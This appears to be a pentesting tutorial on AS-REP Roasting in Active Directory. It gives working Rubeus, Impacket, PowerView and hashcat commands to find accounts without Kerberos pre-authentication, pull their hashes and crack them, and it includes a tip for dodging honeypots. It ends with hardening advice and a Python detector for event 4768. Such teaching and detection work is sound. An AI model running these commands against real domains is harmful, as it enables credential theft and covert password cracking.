AS-REP Roasting

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

AS-REP Roasting consists of identifying domain users that have the DONT_REQ_PREAUTH attribute enabled. With this attribute set, anyone can send an AS-REQ on behalf of such a user and receive an AS-REP message. That message contains data encrypted with the user's key, which is derived from their password, so the user's password can be cracked offline.

This attack can be performed without any initial domain account. Nevertheless, a domain account is needed to list the domain accounts vulnerable to AS-REP Roasting; without one, you will have to guess them.

Prerequisites

  • A low-privileged domain account (to enumerate vulnerable domain users).
  • Target must be a domain user with “Do not require Kerberos preauthentication” (DONT_REQ_PREAUTH) enabled.

Exploit

To enumerate vulnerable accounts, use the following commands. It is also possible to do this with BloodHound.

# Using ActiveDirectory PowerShell module from a domain joined computer.
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $True'

# Using PowerView from a domain joined computer.
Get-DomainUser -PreauthNotRequired -Verbose

# Using ADSearch.
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# Using Impacket.
impacket-GetNPUsers -dc-ip $DomainControllerIP $DomainName/$Username:$Password

If the domain contains accounts vulnerable to AS-REP roasting, request the AS-REP for the affected domain users from a target domain controller with Rubeus or impacket-GetNPUsers.

# From Kali.
impacket-GetNPUsers -dc-ip $DomainControllerIP -request -outputfile hashes.asreproast $DomainName/$Username:$Password

# From a domain joined computer.
.\Rubeus.exe asreproast /outfile:hashes.asreproast /nowrap

# From a Windows computer not joined to the domain.
.\Rubeus.exe asreproast /creduser:$DomainName\$Username /credpassword:$Password /domain:$DomainName /dc:$DomainControllerIP /outfile:hashes.asreproast /nowrap

If you want to be more stealthy and avoid honeypots, request one user at a time. For instance, with Rubeus, add the /user:$target option.

Then crack the AS-REP hash, for instance with hashcat (mode 18200 handles the RC4 AS-REP format).

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Recommendations

  • Disable “Do not require Kerberos preauthentication” for domain users whenever it is technically possible.
  • If disabling “Do not require Kerberos preauthentication” is not technically possible, enforce strong passwords for the affected domain users so that cracking them is hard or even impossible.
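On the detection side, the requests above show up on the domain controller as event 4768 (a TGT was requested) with Pre-Authentication Type 0 and an RC4 (0x17) ticket encryption type. The following script is an added example, not part of the original page or any tool it mentions: it parses constructed 4768 event bodies (field names as Windows logs them are assumed), flags successful no-preauth RC4 requests, and groups them per source host so a host roasting many accounts stands out. It also checks the DONT_REQ_PREAUTH bit used by the LDAP filter above.

```python
import re
from collections import Counter

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit 4194304, same value as the LDAP filter above
RC4_HMAC = 0x17              # ticket etype 23, the AS-REP format hashcat mode 18200 cracks
FIELD = re.compile(r"(Account Name|Client Address|Pre-Authentication Type|"
                   r"Ticket Encryption Type|Result Code):\s*(\S+)")

def is_roastable(uac: int) -> bool:
    """True if a userAccountControl value has DONT_REQ_PREAUTH set."""
    return bool(uac & DONT_REQ_PREAUTH)

def parse_4768(text: str) -> dict:
    """Extract the fields that matter from one 4768 (TGT requested) event body."""
    f = dict(FIELD.findall(text))
    return {"account": f["Account Name"],
            "client": f["Client Address"].removeprefix("::ffff:"),
            "preauth": int(f["Pre-Authentication Type"]),   # 0 = no pre-authentication
            "etype": int(f["Ticket Encryption Type"], 16),  # 0x17 = RC4-HMAC
            "result": int(f["Result Code"], 16)}            # 0x0 = success

def asrep_roast_hits(events):
    """(account, client) for successful TGT requests without pre-auth answered with RC4."""
    hits = []
    for ev in events:
        r = parse_4768(ev)
        if r["result"] == 0 and r["preauth"] == 0 and r["etype"] == RC4_HMAC:
            hits.append((r["account"], r["client"]))
    return hits

def bulk_roasters(hits, min_accounts=2):
    """Clients that roasted several distinct accounts, i.e. mass requests from one host."""
    per_client = Counter(client for _, client in set(hits))
    return {c: n for c, n in per_client.items() if n >= min_accounts}

SAMPLE_EVENTS = [  # constructed 4768 bodies, trimmed to the fields used above
    "Account Name: jdoe\nClient Address: ::ffff:10.0.0.9\nPre-Authentication Type: 2\n"
    "Ticket Encryption Type: 0x12\nResult Code: 0x0",         # normal AES logon with pre-auth
    "Account Name: svc-backup\nClient Address: ::ffff:10.0.0.5\nPre-Authentication Type: 0\n"
    "Ticket Encryption Type: 0x17\nResult Code: 0x0",         # roasted: no pre-auth, RC4 reply
    "Account Name: svc-legacy\nClient Address: ::ffff:10.0.0.5\nPre-Authentication Type: 0\n"
    "Ticket Encryption Type: 0x17\nResult Code: 0x0",         # second account from same host
    "Account Name: nosuchuser\nClient Address: ::ffff:10.0.0.5\nPre-Authentication Type: 0\n"
    "Ticket Encryption Type: 0xffffffff\nResult Code: 0x6",   # unknown principal, no AS-REP
]

if __name__ == "__main__":
    found = asrep_roast_hits(SAMPLE_EVENTS)
    print("AS-REP roast hits:", found)
    print("Hosts roasting several accounts:", bulk_roasters(found))
```

A single no-preauth request for a legitimately configured legacy account is normal noise; several distinct accounts from one host in a short window, or any request for a honeypot account that nothing should ever use, is the signal worth alerting on.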